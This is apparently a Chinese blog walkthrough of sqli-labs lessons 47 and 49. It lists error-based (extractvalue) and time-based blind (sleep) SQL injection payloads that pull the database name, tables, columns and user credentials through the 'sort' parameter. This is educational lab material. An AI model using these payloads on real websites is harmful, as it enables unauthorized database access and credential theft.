当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 22:34:00 【华为云】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()'
这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- 「SDOI2016」征途 题解
- GateWay implements load balancing
- Realize serial port receiving data based on STM32 ring queue
- Dry goods | 10 tips for MySQL add, delete, change query performance optimization
- HTC使用官方固件作为底包制作rom卡刷包教程
- The uniapp applet checks and prompts for updates
- Pytorch lstm time series prediction problem stepping on the pit "recommended collection"
- grep command written test questions
- Transfer Learning - Domain Adaptation
- [Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement
猜你喜欢
什么是客户画像管理?
不知道该怎么办的同步问题
Go mode tidy reports an error go warning “all” matched no packages
[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement
Judging decimal points and rounding of decimal operations in Golang
Flink_CDC construction and simple use
数据分析(一)——matplotlib
Student management system on the first day: complete login PyQt5 + MySQL5.8 exit the operation logic
Financial profitability and solvency indicators
Chapter VII
随机推荐
【ACM】2022.7.31训练赛
The old music player WinAmp released version 5.9 RC1: migrated to VS 2019, completely rebuilt, compatible with Win11
支付模块实现
IDA PRO中汇编结构体识别
Structure of the actual combat battalion module eight operations
grep command written test questions
MATLAB program design and application 2.4 Common internal functions of MATLAB
Transfer Learning - Domain Adaptation
Talking about the algorithm security of network security
Learn about C# anonymous methods
基于RT1052 Aworks nanopb string 类型固定长度使用方式(二十七)
BM3 将链表中的节点每k个一组翻转
面试突击69:TCP 可靠吗?为什么?
@JsonFormat(pattern=“yyyy-MM-dd“)时间差问题
Embedded development has no passion, is it normal?
[QNX Hypervisor 2.2用户手册]9.14 set
如何导入 Golang 外部包并使用它?
Qualcomm cDSP simple programming example (to query Qualcomm cDSP usage, signature), RK3588 npu usage query
Unity-LineRenderer显示一条线
什么是客户画像管理?